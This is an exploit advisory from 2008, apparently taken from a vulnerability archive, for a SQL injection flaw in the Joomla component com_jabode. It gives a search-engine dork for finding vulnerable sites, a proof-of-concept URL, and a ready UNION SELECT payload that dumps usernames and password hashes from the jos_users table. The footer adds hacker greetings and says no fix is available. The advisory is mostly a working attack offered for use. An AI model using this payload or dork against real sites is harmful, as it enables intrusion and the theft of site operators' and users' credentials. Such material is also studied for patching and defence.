Joomla Component jabode (id) Remote SQL Injection Vulnerability

2008-06-28 00:00:00

/---------------------------------------------------------------\
\ /
/ Joomla Component jabode Remote SQL injection \
\ /
\---------------------------------------------------------------/


[*] Author : His0k4 [ALGERIAN HaCkEr]

[*] Dork : inurl:com_jabode

[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id={SQL}

[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,password) FROM jos_users--

[*] Funny note: You can change "taurus" to your sign for best results xd...


----------------------------------------------------------------------------
[*] Greetings : All friends & muslims HaCkeRs...
[*] Greetings2: http://www.dz-secure.com
http://palcastle.org/cc

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.